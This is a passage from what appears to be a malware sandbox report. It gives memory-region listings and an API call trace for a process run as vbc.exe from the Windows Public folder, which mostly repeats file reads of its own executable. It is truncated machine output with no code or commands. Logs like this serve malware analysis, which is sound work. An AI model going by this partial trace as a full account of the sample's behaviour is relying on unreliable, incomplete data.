"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1160 start_va = 0x1ed0000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 1161 start_va = 0x2090000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 1162 start_va = 0x2260000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 1163 start_va = 0x1f10000 end_va = 0x1f22fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 1164 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1170 start_va = 0x25b0000 end_va = 0x2db2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 1178 start_va = 0x67d70000 end_va = 0x67df0fff monitored = 0 entry_point = 0x67d76310 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 1179 start_va = 0x697d0000 end_va = 0x697e5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1218 start_va = 0x67cc0000 end_va = 0x67cf0fff monitored = 0 entry_point = 0x67cd22d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 1237 start_va = 0x74c60000 end_va = 0x74d7efff monitored = 0 entry_point = 0x74ca5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1238 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1239 start_va = 0x2190000 end_va = 0x224bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 1240 start_va = 0x600000 end_va = 0x603fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1241 start_va = 0x6f3d0000 end_va = 0x6f3ecfff monitored = 0 entry_point = 0x6f3d3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1242 start_va = 0x1f30000 end_va = 0x1f31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f30000" filename = "" Region: id = 1243 start_va = 0x1f40000 end_va = 0x1f40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 1244 start_va = 0x2060000 end_va = 0x2064fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 1249 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 46 os_tid = 0x1084 [0167.972] InitCommonControls () [0167.972] SetErrorMode (uMode=0x8001) returned 0x0 [0167.988] OleInitialize (pvReserved=0x0) returned 0x0 [0168.110] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0168.110] LoadLibraryA (lpLibFileName="SHFOLDER") returned 0x67e00000 [0168.529] GetProcAddress (hModule=0x67e00000, lpProcName="SHGetFolderPathA") returned 0x67e01300 [0168.530] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fe24, cbFileInfo=0x160, uFlags=0x0 | out: psfi=0x19fe24) returned 0x1 [0169.379] lstrcpynA (in: lpString1=0x4236a0, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0169.380] GetCommandLineA () returned="\"C:\\Users\\Public\\vbc.exe\" " [0169.380] lstrcpynA (in: lpString1=0x429000, lpString2="\"C:\\Users\\Public\\vbc.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\Public\\vbc.exe\" ") returned="\"C:\\Users\\Public\\vbc.exe\" " [0169.380] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0169.381] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x42a400 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0171.470] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0171.470] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0171.470] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0171.471] GetTickCount () returned 0x177705f [0171.471] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsf", uUnique=0x0, lpTempFileName=0x42a000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsf2FAB.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsf2fab.tmp")) returned 0x2fab [0171.472] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsf2FAB.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsf2fab.tmp")) returned 1 [0171.472] GetTickCount () returned 0x177705f [0171.472] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x42ac00, nSize=0x400 | out: lpFilename="C:\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe")) returned 0x17 [0171.473] GetFileAttributesA (lpFileName="C:\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe")) returned 0x20 [0171.473] CreateFileA (lpFileName="C:\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x1c8 [0171.474] lstrcpynA (in: lpString1=0x429c00, lpString2="C:\\Users\\Public\\vbc.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\Public\\vbc.exe") returned="C:\\Users\\Public\\vbc.exe" [0171.474] lstrlenA (lpString="C:\\Users\\Public\\vbc.exe") returned 23 [0171.474] lstrcpynA (in: lpString1=0x42b000, lpString2="vbc.exe", iMaxLength=1024 | out: lpString1="vbc.exe") returned="vbc.exe" [0171.474] GetFileSize (in: hFile=0x1c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x480d4 [0171.474] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.476] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.477] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.478] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0171.479] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x8000, lpOverlapped=0x0) returned 1 [0171.480] GetTickCount () returned 0x177706e [0171.480] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x8000, lpOverlapped=0x0) returned 1 [0171.480] GetTickCount () returned 0x177706e [0171.481] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x8000, lpOverlapped=0x0) returned 1 [0171.481] GetTickCount () returned 0x177706e [0171.481] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x8000, lpOverlapped=0x0) returned 1 [0171.481] GetTickCount () returned 0x177706e [0171.481] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x8000, lpOverlapped=0x0) returned 1 [0171.481] GetTickCount () returned 0x177706e [0171.481] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x8000, lpOverlapped=0x0) returned 1 [0171.481] GetTickCount () returned 0x177706e [0171.481] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x8000, lpOverlapped=0x0) returned 1 [0171.482] GetTickCount () returned 0x177706e [0171.482] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0x8000, lpOverlapped=0x0) returned 1 [0171.482] GetTickCount () returned 0x177706e [0171.482] ReadFile (in: hFile=0x1c8, lpBuffer=0x417048, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417048*, lpNumberOfBytesRead=0x19fcb0*=0xd0, lpOverlapped=0x0) returned 1 [0171.482] GetTickCount () returned 0x177706e [0171.482] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=295120, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x480d0 [0171.482] ReadFile (in: hFile=0x1c8, lpBuffer=0x19fdf0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fcb0, 